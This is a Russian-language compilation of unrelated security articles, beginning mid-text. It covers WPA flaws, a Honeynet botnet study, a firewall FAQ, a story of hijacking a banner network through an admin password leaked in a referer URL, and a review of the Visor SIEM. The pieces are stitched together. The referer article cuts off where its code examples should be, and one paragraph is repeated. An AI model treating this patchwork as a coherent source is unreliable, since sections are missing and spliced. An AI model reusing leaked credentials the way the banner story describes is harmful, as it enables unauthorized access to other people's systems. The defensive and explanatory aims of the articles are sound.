Естественно, технология WPA не лишена и своих проблем. Robert Moskowitz из ICSA Labs обнаружил, что ключевая фраза WPA может быть взломана. Это происходит из-за того, что хакер может заставить точку доступа регенерировать обмен ключами менее чем за 60 секунд. И даже если обмен ключами достаточно безопасен для мгновенного взлома, его можно будет сохранить и использовать для оффлайнового перебора. еще один вопрос заключается в том, что EAP передает данные открытым текстом. Изначально для шифрования EAP сессий использовался Transport Layer Security (TLS), но для его работы на каждом клиенте требуется сертификат. TTLS несколько исправил эту проблему, но Microsoft (в Windows XP SP1 есть поддержка WPA) и Cisco решили вопрос по своему и создали Protected EAP, отличную от TTLS. Сейчас две технологии конкурируют и вероятно поддержка таких грандов склонит победу к PEAP.
В перспективе нас ждет спецификация 802.11i (профильный комитет Institute of Electrical and Electronic Engineers (IEEE) проголосовал за утверждение нового стандарта для локальных беспроводных сетей 802.11i буквально в прошлом месяце), которая является действительной панацеей от всех головных болей с шифрованием. Новая спецификация включает более эффективный способ отлова злоумышленников, стойкий TKIP, Advanced Encryption Standard (AES), который поддерживает длинные и более безопасные потоки данных нежели TKIP в одиночестве (хотя длинна ключа такая же, 128 бит, алгоритм шифрования во много раз более стойкий). AES уже сейчас широко используется, в частности американским правительством.
802.11i кроме того поддерживает все 802.1x, а так же EAP, а следовательно RADIUS-based аутентификацию, регулярное обновление ключей у клиентов, раздачу уникальных ключей каждому индивидуальному клиенту (что еще уменьшает риск атаки, так как один ключ не даст доступа ко всему трафику остальных клиентов).
Серые кардиналы Веба
Автор: Евгений Золотов
Интернет давно вышел из младенческого возраста с присущей ему простотой. Глобальная сеть сегодня — невообразимо сложная, многоярусная структура, в которой взгляду рядового путешественника доступна лишь незначительная часть. Нырять глубже, в тёмные глубины виртуальных вод, решаются немногие — одной смелости для этого мало, нужно особое оснащение. Но диковинки, которые приносят с собой исследователи, стоят и труда, и риска. На днях немецкие специалисты по информационной безопасности опубликовали отчёт об одной такой экспедиции, длившейся несколько месяцев: осенью прошлого года группа специалистов начала изучение яруса ботнетов и сейчас делится своими находками.
Ботнеты (от англ. botnets) — онлайновый андеграунд, преисподняя Веба — множество субсетей, протянутых по каналам интернета автономными клиентами, в роли которых выступают вирусные и шпионские программы (боты). Паразитирующие на обычных персоналках и серверах, боты в значительной степени самостоятельны (репликация, поддержание связи с другими узлами, выполнение различных задач на заражённых машинах — всё это они делают сами), но в конечном счёте всегда подчинены своим хозяевам. Последние управляют ботнетами удалённо, обычно через публичные IRC-каналы. Антивирусным компаниям и специалистам по защите систем и сетей сегодня известно несколько десятков популярных разновидностей ботов, анализ их позволяет судить и о задачах, выполняемых сетями таких программ (проведение DdoS-атак, рассылка спама, кража данных). Считается, что компьютеры, входящие в состав бот-сетей, составляют значи! тельную часть сети глобальной, но какова в точности их массовая доля, сказать, по понятным причинам, трудно: создатели ботнетов не афишируют свою работу, а доступ к этим сетям требует знания закрытой информации.
Пролить свет на киберкриминальный феномен удалось немецким исследователям, участвующим в интернациональном проекте Honeynet Project. Для изучения ботнетов они применили оригинальную технику, позволившую взглянуть на проблему изнутри: сеть-приманку (honeynet), составленную из нескольких машин под управлением Microsoft Windows, замаскированных под обычные домашние персоналки, но на самом деле оснащённых особым программным обеспечением для мониторинга. Подключение «подставных» машин к Сети уже через несколько минут приводило к их заражению какой-либо заразой, которая часто подключала инфицированную PC к одной из развёрнутых в интернете ботнетов. Анализируя исходящий трафик и исследуя по выловленным из него ссылкам различные веб-ресурсы, авторы работы получили уникальные результаты. Подробности можно найти в увлекательном отчёте, опубликованном на сайте honeynet.org («Know Your Enemy: Tracking Botnets»), здесь же хотелось бы остановиться на самых интересных общих моментах.
Прежде всего впечатляет размах: всего за три месяца исследователям удалось обнаружить более сотни ботнетов, в каждой из которых присутствовало от нескольких сотен до десятков тысяч машин. Экстраполяция на глобальную сеть позволяет авторам исследования утверждать: по самой скромной оценке в Сети работает более одного миллиона машин, заражённых той или иной разновидностью бот-заразы. Преимущественно это домашние персоналки с постоянным интернет-подключением и операционной системой Microsoft Windows (XP SP1, Windows 2000 и более ранних версий). Самым популярным инструментом, используемым ботами для координации своих действий, а их хозяевами — для управления ботнетами в целом, действительно являются сети IRC. Подтвердился и ряд других предположений, прежде всего касающихся задач, решаемых с помощью таких сетей. Ботнеты активно применяются для организации DDoS-атак. Трафик, порождаемый даже одной сетью из нескольких сотен PC, превышает способности средней корпоративной локалки! а крупные ботнеты способны «завалить» и самые мощные из существующих распределённых сетевых структур: временный выход из строя летом прошлого года сети кэширующих серверов Akamai Technologies предположительно был вызван ботнет-атакой. Используются ботнеты и для рассылки спама, и как стартовые площадки для вирусных эпидемий: многие боты умеют распространяться самостоятельно, эксплуатируя широко известные уязвимости в ОС семейства Windows. Наконец, было практически подтверждено и существование бот-сетей, ведущих «шпионскую» деятельность: прослушивающих трафик инфицированных машин, «подслушивающих» клавиатурный ввод их пользователей.
Но нашлись и ботнеты, занятые другими задачами. Исследователи из Honeynet описывают подсмотренную ими сеть ботов, занятую кражей виртуальных товаров у пользователей игры Diablo 2 и автоматической перепродажей их с аукциона на сайте eBay. Машины в другой бот-сети «накручивали» денежный счёт её хозяев в рекламной системе Google AdSense. В ходе наблюдений был зафиксирован случай применения ботнета в разборках между конкурирующими компаниями, попытки использования таких сетей для манипуляции результатами онлайновых опросов, применение их для динамического хостинга поддельных сайтов, копирующих сайты финансовых учреждений.
Удивляет и удручает одновременно то, что типичным организатором ботнетов, по усреднённому описанию, составленному исследователями, является подросток с весьма скудным программистским опытом. Увы, компьютер стал предметом быта, квалификация среднего пользователя стремится к нулю, а с ней и квалификация киберзлоумышленников. Впрочем, авторы «Know Your Enemy» расслабляться не советуют, предупреждая, что даже в неумелых руках, ботнет — очень опасное оружие. А среди организаторов этих сетей попадаются и высококлассные специалисты, скорее всего работающие на организованную преступность. Потенциал бот-сетей высок, поэтому спектр и сложность атак с их применением будут расти, а с ними и сложность бот-алгоритмов. И недалёк тот день, когда с простецких IRC-каналов боты перейдут на сложные децентрализованные P2P-механизмы, затруднив своё обнаружение, поднявшись на новую ступеньку эффективности. Всё это настоятельно требует активизировать работы по изучению ботнетов. Криминальное соо! бщество Веба не спит — нельзя спать и тем, кто ему противостоит. Ботнеты (от англ. botnets) — онлайновый андеграунд, преисподняя Веба — множество субсетей, протянутых по каналам интернета автономными клиентами, в роли которых выступают вирусные и шпионские программы (боты).
Что такое брандмауэр?
Автор: Александр Красоткин
Что такое брандмауэр?
Брандмауэр (firewall) — перегородка из огнеупорного материала, возводимая на пути распространения пожара. Также данный термин стал использоваться для обозначения аппаратных и программных средств сетевой защиты (сетевой экран). Пожалуй, такое название было выбрано из маркетинговых соображений: «Пусть за стеной бушует пожар или беснуются варвары, но вам за надежной защитой ничего не грозит». В действительности сетевой экран походит не на сплошную стену, а на таможенный пост, где в соответствии с предписаниями проверяется багаж путешественников. Если груз к ввозу или вывозу разрешен, его пропускают. Если нет — извините. Причем решения принимаются на основе адресов получателя/отправителя, а не содержимого груза. Так что доверенный отправитель может отправить своему визави не только поздравительную открытку, но и грамм триста тротилового эквивалента. Таможня «посылочку» пропустит, если связь разрешена в предписании.
Какие бывают брандмауэры?
Программные или аппаратные. Последние специально спроектированы для фильтрации трафика устройства. В среднем их производительность гораздо выше, чем у программных брандмауэров, что особенно заметно на крупных информационных магистралях. Ценой они также различаются (угадайте, кто дороже).
Что брандмауэр не делает?
Не анализирует передаваемые данные. Решение позволить/запретить передачу сетевых пакетов принимается на основе их адресной информации (сетевые адреса и порты отправителя/получателя). Причем данные, передаваемые в пакетах, не рассматриваются (а это может быть вредоносный код для взлома программы).
Владелец одного ресурса, после того как его веб-сервер взломали: а) нехорошо отозвался о вирусописателях; б) удивился, как сайт могли взломать, если он был закрыт брандмауэром. Ответ: а) вирусописатели встречаются разные; б) взломали сайт через уязвимость web-сервера, а доступ к нему в брандмауэре был открыт. Для анализа передаваемых по сети данных предназначены программы, получившие название сетевые системы обнаружения вторжения (Network Intrusion Detection System, NIDS). Это аналог антивирусного монитора, адаптированного для сетевого трафика. Просматривая пропущенный брандмауэром трафик, NIDS, зафиксировав начало сетевой атаки, передает сигнал брандмауэру. Тот, соответствующим образом изменив правила фильтрации, прерывает нападение. Связка «брандмауэр — NIDS», гибко реагируя на возникающую угрозу, обеспечивает гораздо лучшую сетевую защиту, чем лишь один брандмауэр. Девизом брандмауэра можно было бы назвать: «Все, кому разрешен доступ, — джентльмены». Девиз же NIDS: «И за джентльменами надо присматривать».
Что брандмауэр и NIDS не делают?
Не шифруют передаваемые данные.
Это не их задача, но согласитесь, немногого стоит надежность банка, если деньги он пересылает в обычных почтовых конвертах. Вернувшись к аналогии с бюрократами, отмечу, что большое число программ — ICQ, FTP, почтовые клиенты (протоколы SMTP/POP3), интернет-браузеры (HTTP) и т. д. — передает данные в открытом виде. Следовательно, любой, кто перехватит курьера, может их прочитать. Поэтому при использовании ненадежных каналов связи (интернет в первых рядах) для передачи конфиденциальных данных следует использовать криптозащиту. Будет ли это PGP-кодирование почты или VPN-соединение различных сетей, зависит от решаемых задач. Поскольку данная тема далеко выходит за рамки статьи, на этом мы и остановимся.
Что еще ожидать от брандмауэра?
Падения работоспособности системы.
Программный брандмауэр при повышении объема сетевого трафика требует больше вычислительных ресурсов. Высокая скорость передачи данных накладывает требования ко времени обработки трафика. Цена вопроса: устойчивость сетевых соединений.
Мы живем в эпоху идеально продуманных операционных систем и совершенных аппаратных платформ, где драка за ресурсы невозможна в принципе. В большинстве офисных и домашних локальных сетей шлюз построен на базе компьютера а-ля пишущая машинка. За ней сидит девушка с Word’ом, прикручен принтер, а еще есть дисковод. В результате периодически «интернет отваливается».
Если поставить два программных брандмауэра, будет круче?
Нет. Возникнет конфликт между программами, когда они будут одновременно пытаться работать с сетью. Вместо повышенной защиты вы получите дыру. Лучше обращать внимание на качество, а не на количество.
Какой из сетевых брандмауэров самый крутой?
Отражающий сетевые атаки. Большинство распространенных программных защит функционально схожи между собой. Часто выбор между той или иной программой определяется личным вкусом и языком интерфейса. Но несмотря на стремление разработчиков сделать интерфейс максимально дружелюбным, управление любым брандмауэром требует понимания основ сетевой активности.
Поставил брандмауэр, что дальше?
Аудит. Практика — критерий истины. Следующий этап после построения защиты — ее проверка. Добро пожаловать на ресурс PC FLANK.
Вирусы вредные?
Вирус-лекарь NetSky отыскивает в сети системы, зараженные другим вирусом, вылечивает их, а также устраняет уязвимость, использованную для заражения. На первый взгляд создатель NetSky заслуживает уважения за «души благородный порыв», но глубина людской неблагодарности, наверное, потрясла его. Смотрим дальше. Платой за услугу становится сетевой трафик, потраченный NetSky при рассылке своих копий с вылеченной им системы. В одном случае вирус за несколько дней нагнал больше шести гигабайт трафика, прежде чем владелец компьютера спохватился. Это еще раз подтверждает, что спасение утопающих — дело рук самих утопающих. За помощь приходится платить.
И улыбнемся напоследок
— Кум, у тэбе мпеги е?
— Е, заходи ко мне на фтп!
— Так у тя ж файрволл.
— А то ж!
История взлома баннерной сети или охота на referer’ы
Автор: Михаил Чернов
Порой бывает так, что для проникновения в чужую систему, злоумышленнику вообще не приходиться искать какие-либо уязвимости в ней, т. к. поистине ценная находка его ожидает в log`ах собственного веб-сайта. Прежде чем приступить к повествованию, я хочу предупредить вас, что вся информация, представленная в этой статье, служит чисто в ознакомительных целях. Чтобы указать на возможные недоработки разработчикам web-приложений. Автор не несёт никакой ответственности за использование этой информации, в целях, запрещённых Уголовным Кодексом, или какого-либо другого законодательства.
Итак, всё по порядку:
Что такое referer?
referer — это url (интернет адрес) страницы, с которой браузер осуществил переход на текущую страницу. Например, если имеется страница расположенная по адресу «http://www.site1.com/page1.html » и с помощью гиперссылки браузер с неё переходит на страницу «http://www.site2.com/page2.html», то referer’ом в данном случае окажется адрес первой страницы (http://www.site1.com/page1.html).
Зачем нужен referer?
referer широко используется в системах для подсчёта статистики. Для того, чтобы администратор веб-сайта мог следить за количеством посетителей, пришедших на его ресурс с того или иного сайта (и/или страницы). Когда referer может быть опасным? Он может быть опасен в тех случаях, когда адрес ссылающейся страницы на сайте содержит в себе критическую информацию, т. е. пароли, хэши паролей, сессии (словом — всё то, что может облегчить жизнь потенциальному взломщику)…
Пример опасного referer’а: http://www.bannerz.com/cgi-bin/banneradmin.cgi?login=admin&passwd=qwerty&url=http://abc.tsi.lv
История взлома баннерной системы
Всё началось с того, что в один прекрасный день (или вечер, уже точно не помню), Вася Пупкин, для привлечения новых посетителей на свой сайт, решил установить баннер. Для достижения намеченной цели, Вася выбрал подходящую баннерную сеть, зарегистрировался, разместил там надлежащим образом свой баннер и добавил код системы на свой сайт. Убедившись, что всё работает как надо, он со спокойной душой продолжил играть в half-life 2 =).
Как говорят в таких случаях — «долго ли, коротко ли», но при проверке статистики на следующий день Васю ждал приятный сюрприз. Оказывается пока он спал, на сайт заходил администратор баннерной системы, а самое главное, что в статистике от этого посещения остался «реферер» следующего вида:
login=admin&passwd=qwerty&url=http://abc.tsi.lv В данной строке отчётливо виднелся как логин, так и пароль администратора системы! А что ещё нужно было нашему герою для «незначительного» увеличения количества показов своего баннера и других манипуляций с системой?! Правильно — ничего! Вот таким образом и была взломана баннерная сеть.
Как избежать этой ошибки при написании сценариев?
1) Для того, чтобы важные данные не попадали в строку адреса, а соответственно и в поле referer, рекомендуется отсылать их с помощью http метода post, а не get.
Вот примеры «иллюстрирующие» отличия методов get и post
html форма отсылаемая методом get:
url формирующийся в строке браузера после отсылки формы (get):
Обзор Visor 1.1 – российской SIEM-системы

Платформа мониторинга информационной безопасности Visor от компании ФГУП «НПП «Гамма» — это новая российская SIEM-система, которая позволяет решать основные задачи сбора, анализа и автоматической корреляции событий, обнаружение инцидентов ИБ. Visor ориентирован в первую очередь на государственных заказчиков и позволяет обеспечить информационное взаимодействие с НКЦКИ или ведомственным центром ГосСОПКА штатными средствами. ВведениеАрхитектура платформы мониторинга информационной безопасности VisorФункциональные возможности платформы мониторинга информационной безопасности VisorСистемные требования платформы мониторинга информационной безопасности VisorУстановка и настройка SIEM-системы Visor5.1. Установка сервера Visor5.2. Установка агентов VisorИспользование платформы мониторинга информационной безопасности Visor6.1. Лицензирование SIEM-системы VisorВыводы ВведениеС ростом сложности и важности ИТ-инфраструктуры организаций значительно возрастают риски, связанные с обеспечением их информационной безопасности (ИБ). Задача построения центра мониторинга и реагирования на инциденты становится краеугольным камнем всего процесса обеспечения информационной безопасности. В крупных компаниях с объектами критической информационной инфраструктуры (КИИ) никаким увеличением штата ИБ не получится решить задачу эффективного мониторинга и выявления инцидентов информационной безопасности из огромного потока данных, поэтому для оптимизации процессов необходима автоматизация. Именно для этого и служат SIEM-системы (Security Information and Event Management). В своих обзорах мы уже не первый раз рассматриваем продукты этого класса. В частности, вы можете ознакомиться материалами о том, зачем SIEM нужны, а также посмотреть на наше сравнение таких систем.Востребованность SIEM-систем на рынке значительно повышается под влиянием регулирующих органов. В частности, с 1 января 2018 года вступил в силу Федеральный закон «О безопасности критической информационной инфраструктуры Российской Федерации» от 26.07.2017. Он обязывает государственные или коммерческие компании, субъекты КИИ подключиться к государственной системе обнаружения, предупреждения и ликвидации последствий компьютерных атак ГосСОПКА. В рамках информационного взаимодействия в главный центр ГосСОПКА (НКЦКИ) в обязательном порядке будут передаваться данные о связанных с информационной безопасностью инцидентах на объектах КИИ.SIEM-системы являются одним из базовых элементов технической платформы для сбора данных о событиях ИБ на предприятии, выявления и обработки инцидентов и передачи информации о них в центр ГосСОПКА.В качестве краткой выжимки перечислим лишь самые основные задачи SIEM:Сбор событий со всех критически важных узлов ИТ-инфраструктуры в едином месте.Категоризация и нормализация данных. Проще говоря — приведение этих разрозненных по форматам данных к «общему знаменателю» для того, чтобы получить возможность сравнивать и анализировать эти события.Корреляция происшествий: автоматическое обнаружение связей и зависимостей между событиями из разных источников.Обнаружение подозрительных и опасных событий среди потока этих данных.Оповещение службы безопасности об обнаруженных инцидентах.Предоставление информации об инциденте для дальнейшего анализа.Обеспечение информационного взаимодействия с другими системами реагирования и управления ИБ.Рассмотрим одну из таких систем — Visor 1.1 от ФГУП «НПП «Гамма». Архитектура платформы мониторинга информационной безопасности VisorПознакомиться с архитектурой платформы удобнее всего на схеме, предлагаемой производителем. Продукт состоит из следующих компонентов: Рисунок 1. Принцип работы платформы Visor 1.1 Таблица 1. Защитные компоненты Visor 1.1Агент для WindowsТакие агенты должны быть установлены на всех узлах, события на которых нужно контролировать.Агент-коллекторАгент-коллектор — это фактически специальный прокси-сервер. Он выполняет все задачи обычного агента, а в дополнение к этому еще собирает и передает информацию с обычных агентов на сервер Visor. За счет такой организации достигается повышенная устойчивость всей системы в целом, даже в случаях с плохим каналом связи или при сложной структуре сетиСервер VisorСервер платформы Visor отвечает за:получение,хранение,обработку данных от агентов и агентов-коллекторов,поиск,визуализацию данных,формирование отчетов,оповещение об инцидентах,разграничение прав доступа администраторов. Часть информации сервер Visor собирает без помощи агентов. Речь идет о таких источниках как syslog, Windows log, базы данных (при помощи ODBC/JDBC), SNMPКонсоль управленияВсе управление и работа с платформой ведется в браузере через веб-консоль На момент написания статьи Visor может работать только на Windows. Поддержка Linux уже запланирована и должна появиться в следующих версиях. Функциональные возможности платформы мониторинга информационной безопасности VisorНесмотря на кажущуюся простоту архитектуры и «молодость» продукта, Visor 1.1 выполняет все задачи, стоящие перед современными SIEM:Силами сервера Visor, агентов и агентов-коллекторов продукт позволяет собирать информацию с критически важных узлов в сети. При необходимости производитель берется под заказ в оперативном порядке добавить поддержку необходимых вам устройств. Ко всему прочему, система дополнительно отслеживает данные о доступности и состоянии узлов, а также проводит инвентаризацию как на аппаратном уровне, так и на уровне программного обеспечения.Собранные данные нормализуются и сохраняются в базу Visor, что в дальнейшем позволяет системе производить операции по поиску и корреляции событий. А в случае обнаружения подозрительных событий и срабатывания одного из заданных правил, Visor автоматически создаст инцидент безопасности. Оповещения об инцидентах могут быть как отражены в интерфейсе самого продукта, так и отправлены администратору по почте.Есть в Visor и дополнительная функциональность — в продукте заранее предусмотрена возможность отправки инцидентов в ГосСОПКА.Всю наиболее важную информацию Visor позволяет выводить на дашборды, которые каждый заказчик может настроить под свои нужды. Более подробно мы рассмотрим этот интерфейс в разделе про работу с продуктом. Системные требования платформы мониторинга информационной безопасности VisorСистемные требования для установки определяются несколькими основными параметрами:Предполагаемым средним количеством обрабатываемых событий в секунду и средним объемом, занимаемым одним событием.Требуемым сроком хранения исторических данных.Также стоит учесть, что события могут какое-то время храниться не только на сервере Visor, но и на самих агентах, а следовательно, на агентах также нужно иметь необходимое количество места на диске. Таблица 2. Рекомендуемые требования к аппаратному обеспечению сервера платформы VisorКоличество собираемых событий в секундуПроцессорОЗУПЗУRAID- массивАппаратная платформа500-3000 событий/сек1 х Intel Xeon-E5 от 6-ти ядер с частотой от 1700 МГц и вышеОт 16 Гбайт, DDR4От 10 ТБайт102 сетевых интерфейса Gigabit EthernetВозможность увеличения ОЗУ до 256 ГбНаличие резервного питания (2х500/700 Вт)Возможность увеличения ПЗУВозможность установки дополнительного сетевого интерфейса 4000-7500 событий/сек2 х Intel Xeon-E5 от 6-ти ядер с частотой от 1700 МГц и вышеОт 32 Гбайт, DDR4От 40 ТБайт10 Таблица 3. Рекомендуемые требования к аппаратному обеспечению агента или агент-коллектора платформы VisorПроцессорОЗУПЗУАппаратная платформа1 х Intel Pentium 4, с частотой от 3 Ghz и вышеОт 1 ГбайтОт 40 МбНаличие сетевого интерфейса (10 Мбит/с и более) Помимо требований к инфраструктуре, для установки Visor 1.1 потребуется еще иметь Microsoft .NET Framework 4.5.1 и Microsoft SQL Server на машине с сервером Visor и на машинах с агентами.Полный список рекомендаций производителя и системных требований приведен в технической документации к продукту. Установка и настройка SIEM-системы VisorУстановка сервера VisorДля установки сервера Visor 1.1 предлагаются на выбор два варианта: из дистрибутива или при помощи виртуальной машины, на которой уже все установлено производителем. Прежде чем приступать к установке самого продукта, нужно убедиться, что выполнены некоторые подготовительные работы:Проверить, что на вашей машине и защищаемых узлах, выставлены единые настройки системного времени. В противном случае невозможно будет определить точное время событий, а значит, могут возникнуть трудности с корреляцией событий.Убедится, что операционная система и прикладное программное обеспечение установлены и обновлены до последних версий.На вашей машине в числе прочего установлены и настроены все необходимые средства защиты информации, антивирусные системы, межсетевые экраны и т. п.Если вы устанавливаете продукт из дистрибутива, то потребуется установить:Microsoft .NET Framework 4.5.1Microsoft SQL ServerЗавершив подготовительный этап, можно переходить к установке непосредственно самого сервера Visor. Рисунок 2. Запуск мастера установки Visor 1.1 Рисунок 3. Подключение к базе данных в Visor 1.1 В ходе установки Visor нужно будет указать адрес сервера, где находится база данных для хранения всех событий, а также ввести учетные данные администратора. Рисунок 4. Настройка параметров учетной записи администрации в Visor 1.1 На одном из этапов установки потребуется придумать логин и пароль для администратора Visor.Если Visor разворачивается из виртуальной машины, то потребуется ее импортировать в гипервизор. С точки зрения настройки есть некоторые тонкости. К примеру, вам уже не потребуется устанавливать базу данных, но общие этапы про настройку системного времени, установку всех обновлений операционной системы и программного обеспечения сделать все же нужно. Хочется подчеркнуть, что весь процесс установки как сервера, так и других компонентов, во всех деталях описан в документации к продукту.Все дальнейшее управление продуктом уже происходит через веб-браузер.Установка агентов VisorУстановку агентов можно выполнить тремя разными методами:Установить вручную из дистрибутива продукта. Рисунок 5. Мастер установки агента Visor 1.1 Рисунок 6. Настройка для присоединения к серверу или агенту-коллектору в мастере установки агента Visor 1.1 из дистрибутива При установке агента будьте готовы указать адрес вашего сервера или агента-коллектора Visor. Рисунок 7. Настройка параметров работы агента в мастере установки агента Visor 1.1 из дистрибутива В ходе установки у вас будет возможность настроить параметры взаимодействия между агентами и сервером. Более детально этот процесс описывается в документации.Установить через веб-консоль Visor. Рисунок 8. Указание параметров для соединения в мастере установки агента Visor 1.1 через веб-консоль Для установки через веб-консоль необходимо найти и указать нужный узел, на который будет производиться установка, а также учетные данные администратора. Искать узлы можно либо по конкретному адресу, либо воспользовавшись поиском с указанием маски подсети.Установить при помощи доменных политик Active Directory.Для дистанционной установки агента с использованием политик Active Directory используется соответствующий .msi-пакет дистрибутива платформы Visor. Настроить конфигурационный файл после установки можно либо дистанционно через веб-интерфейс Visor, либо вручную локально на защищаемом узле.Какой бы способ вы ни выбрали, прежде чем приступать к самой установке агентов, требуется, как и для сервера Visor, сначала сделать некоторые подготовительные работы, которых мы уже касались ранее.Полное описание всех шагов и рекомендации по установке приведены в документации к продукту. Использование платформы мониторинга информационной безопасности VisorРассмотрим процесс работы с платформой мониторинга ИБ на конкретных примерах.Начнем с быстрой визуальной оценки ситуации за время, когда оператора могло не быть на рабочем месте. Именно на решение этой задачи ориентирован дашборд системы. Рисунок 9. На графиках в панели мониторинга Visor 1.1 видны категории событий ИБ и количество этих событий за указанный период В этом примере легко оценить количество и источники событий, произошедших за заданный промежуток времени в контролируемых системах. Рисунок 10. Отображение событий с привязкой к географическому расположению в панели мониторинга Visor 1.1 В некоторых ситуациях удобно использовать мнемоническое восприятие и наносить данные на географическую карту с целью получения наглядной привязки к расположению. В данном примере видны пять разнесенных филиалов компании: в Москве, Санкт-Петербурге, Минске, Нижнем Новгороде и Воронеже. Здесь же видны и источники событий.Стоит отдельно отметить, что Visor позволяет использовать не только карту. В систему можно загрузить необходимое для конкретной организации изображение: карту территории завода или производственного помещения, в стенах которого находятся критически важные узлы, отвечающие за технологический процесс предприятия. Рисунок 11. Отображение данных инвентаризации узла в Visor 1.1 При необходимости система может предоставить детальную информацию о каждом контролируемом узле. Как видно на рисунке 11, на данном узле запущен агент Visor. А это означает, что у нас есть информация о состоянии операционной системы, перечень учетных записей на узле, списки программ и аппаратных устройств и т. п.В процессе мониторинга у сотрудников ИБ может возникнуть необходимость разобраться с возникшим в ходе работы системы инцидентом и расследовать всю цепочку событий — для этого нужен весь арсенал средств поиска и фильтрации информации по логам. Рисунок 12. Поиск событий и фильтрация при помощи Visor 1.1 В нашем примере видно, что в результате поиска в журналах безопасности Windows в промежуток времени между четвертым и седьмым декабря на выбранном узле обнаружились многократные входы в систему с использованием привилегированной учетной записи.Само по себе это событие еще ни о чем не говорит, но может оказаться важным при сопоставлении его с другими событиями. Для автоматизации сопоставления разрозненных событий в системе заведены различные правила корреляции. Рисунок 13. Правила корреляции в Visor 1.1 В панели с правилами корреляции выводится список всех правил, которые в данный момент существуют в системе. В этом примере видно одно из правил. Все они записываются на языке EPL, синтаксис которого напоминает SQL. Это удобно, ведь даже не имея глубинных знаний, можно понять, что Visor создаст новый инцидент безопасности с высоким приоритетом в случае, если в десятиминутном интервале времени от «Антивируса Касперского» с нескольких разных машин из сети придут уведомления об обнаруженном заражении. Новые правила на языке EPL можно добавлять самостоятельно, или обратившись к производителю за помощью.При необходимости инциденты можно создавать и вручную. Рисунок 14. Создание инцидента безопасности вручную в Visor 1.1 Опытные пользователи сразу обратят внимание на три закладки в верхней части экрана. В данный момент мы смотрим на краткое представление инцидента, где есть лишь самые необходимые поля для создания инцидента. Во второй вкладке — расширенный набор полей.Отдельного внимания заслуживает вкладка ГосСОПКА — это как раз та самая возможность отправки данных об инциденте в НКЦКИ или ведомственный центр ГосСОПКА прямо внутри продукта. В данный момент согласно Федеральному закону «О безопасности критической информационной инфраструктуры Российской Федерации» от 26.07.2017 N 187-ФЗтребования по передаче данных об инцидентах предъявляются к субъектам, и поэтому такая интеграция Visor с ГосСОПКА — это большой плюс. Рисунок 15. Форма отправки инцидента в ГосСОПКА в Visor 1.1 Платформа Visor позволяет выгружать паспорт инцидента в формате JSON отдельно, что добавляет гибкости на случай, если формат данных изменят, а интерфейс самого продукта при этом может обновиться не сразу.Еще одной частой задачей службы ИБ, а следовательно, и продукта мониторинга является контроль ИТ-инфраструктуры и выявление аномалий. В частности, под такое событие подпадает обнаружение новых несанкционированных устройств в сети — это серьезный инцидент ИБ. Важно оперативно обнаруживать такие ситуации и идентифицировать тип устройства. Visor учитывает такой сценарий. В агентах и агентах-коллекторах встроен специальный сканер сети, который можно настроить так, чтобы он периодически сканировал сеть и сообщал о новых обнаруженных сетевых устройствах. Рисунок 16. Поиск новых устройств в сети силами агентов Visor 1.1 Как видно, можно создать множество задач на сканирование сети и даже настроить все так, чтобы сканирование происходило постоянно, а не только по запросу оператора. Обнаруженные узлы можно добавить в белый список узлов или разрешенных устройств. Также в системе можно настроить правила оповещения службы ИБ в случае обнаружения новых устройств.Кроме того, Visor позволяет гибко настраивать права доступа к системе для администраторов, в зависимости от конкретной необходимости. Рисунок 17. Настройка ролевой модели доступа к Visor 1.1 Для каждого администратора можно определить права на чтение и запись к каждой вкладке в интерфейсе продукта.Лицензирование SIEM-системы VisorОтдельно хочется сказать несколько слов про лицензирование продукта. Крупные производители SIEM-систем предпочитают в расчете стоимости конкретного проекта отталкиваться от количества событий, обрабатываемых за единицу времени (EPS). Другими словами, чем больше сеть, тем больше SIEM будет получать и обрабатывать событий и тем выше выйдет финальная стоимость.Стоимость платформы Visor рассчитывается не по количеству событий, а по количеству контролируемых узлов. Такой подход к ценообразованию делает Visor в ряде случаем значительно более доступнее и привлекательнее по цене для потенциальных заказчиков.Работы по созданию дополнительных правил или поддержке нестандартных устройств являются отдельным фактором при расчете стоимости решения. ВыводыРешение о покупке и внедрении SIEM-системы — крайне непростое решение для компаний любого размера. Это связано не столько со стоимостью самого приобретения, сколько в большей степени со сложностью и длительностью внедрения и настройки.Платформа Visor имеет необходимые функции для сбора событий информационной безопасности с различных узлов сети, их корреляции и выявление подозрительных или опасных инцидентов.Для государственных компаний и частных организаций, попадающих под требования 187-ФЗ, и обязанных подключиться к системе ГосСОПКА, накладываются дополнительные требования к сертификации SIEM-системы и возможностям ее использования для информационного взаимодействия с НКЦКИ в автоматическом или ручном режиме. Платформа Visor версии 1.1 имеет встроенную возможность выгрузки или прямой отправки данных об инциденте в НКЦКИ или ведомственный центр ГосСОПКА в формате JSON.В середине текущего года Visor SIEM получит сертификат ФСТЭК России по 4 уровню контроля РД НДВ и ТУ.ДостоинстваНеобходимый набор возможностей для поиска и корреляции событий информационной безопасности.Автоматическая фильтрация важных событий в потоке данных с критически важных узлов сети.Встроенный сканер сети для обнаружения несанкционированных устройств.Простота в использовании, возможность нанесения данных на карту местности или технологического объекта.Механизмы работы в сетях с неустойчивым каналом связи за счет агентов-коллекторов.Решение изначально разрабатывалось с учетом требований регуляторов: ФСБ и ФСТЭК России, поэтому в продукте сразу предусмотрена связь по API с ГосСОПКА.Российский производитель, документация и поддержка на русском языке.При желании заказчика предоставляется аутсорсинг части задач в центр мониторинга ФГУП «НПП «Гамма».Обучающие курсы для заказчиков по теоретическим основам и использованию платформы Visor.НедостаткиСистема работает только на платформе Microsoft Windows.Небольшой список поддерживаемых источников данных.Небольшой набор готовых правил корреляции.В качестве потенциальной области дальнейшего развития платформы можно отметить возможность добавления автоматического обнаружения и корреляции подозрительных событий при помощи эвристических механизмов или машинного обучения.
Обзор Avast Driver Updater
February 18, 2019, 11:08 am

